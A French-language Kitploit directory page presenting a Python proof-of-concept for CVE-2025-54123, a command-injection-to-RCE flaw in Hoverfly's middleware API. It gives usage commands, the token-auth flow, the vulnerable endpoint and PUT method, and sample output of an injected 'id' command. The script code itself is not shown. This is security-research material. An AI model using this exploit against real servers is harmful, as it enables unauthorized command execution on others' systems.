Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-54123 — Preuve de concept en Python pour CVE-2025-54123, démontrant une injection de commande menant à une RCE dans l'API middleware Hoverfly avec authentification par identifiants ou par jeton. | Kitploit
Outils/GitHubGitHub/0xk4rth1/cve-2025-54123
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHub0xk4rth1/cve-2025-54123

CVE-2025-54123

Preuve de concept en Python pour CVE-2025-54123, démontrant une injection de commande menant à une RCE dans l'API middleware Hoverfly avec authentification par identifiants ou par jeton.

Voir le dépôt
22il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-54123 Hoverfly - PoC d'injection de commande vers RCE

Aperçu

Ce dépôt contient un script Python de proof-of-concept (PoC) pour interagir avec les instances Hoverfly affectées par CVE-2025-54123.

Le script prend en charge :

  • Authentification avec identifiants (nom d'utilisateur/mot de passe)
  • Authentification avec un token bearer existant
  • Interaction avec le point de terminaison API du middleware Hoverfly
  • Affichage de la sortie de la réponse API

Avertissement

Ce projet est destiné uniquement à la recherche en sécurité autorisée, aux tests et à des fins éducatives. Ne l'utilisez pas contre des systèmes sans autorisation explicite.


Prérequis

  • Python 3.8+
  • requests

Installer les dépendances :

root@kitploit:~
pip install requests

Utilisation

Authentification avec identifiants

root@kitploit:~
python CVE-2025-54123.py \
  --target example.com \
  --port 8888 \
  -u admin \
  -p password \
  --cmd "id"

Authentification avec un token existant

root@kitploit:~
python CVE-2025-54123.py \
  --target example.com \
  --port 8888 \
  --token <ACCESS_TOKEN> \
  --cmd "id"

Arguments

ArgumentDescription
--targetDomaine cible ou adresse IP
--portPort du service cible
-uNom d'utilisateur Hoverfly
-pMot de passe Hoverfly
--tokenToken bearer existant
--cmdChaîne de commande fournie au point de terminaison middleware

Flux d'authentification

Lorsque des identifiants sont fournis :

  1. Une requête POST est envoyée à :
root@kitploit:~
/api/token-auth
  1. Le token retourné est extrait.
  2. Le token est utilisé pour authentifier les requêtes suivantes.

Point de terminaison API

Le script communique avec :

root@kitploit:~
/api/v2/hoverfly/middleware

à l'aide d'une requête PUT authentifiée.


Exemple de sortie

root@kitploit:~
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)

Structure du projet

root@kitploit:~
.
├── CVE-2025-54123.py
└── README.md

Clause de non-responsabilité

Ce dépôt est fourni uniquement à des fins éducatives, de sécurité défensive et de tests autorisés. L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques découlant de l'utilisation de ce logiciel.

Télécharger l’outil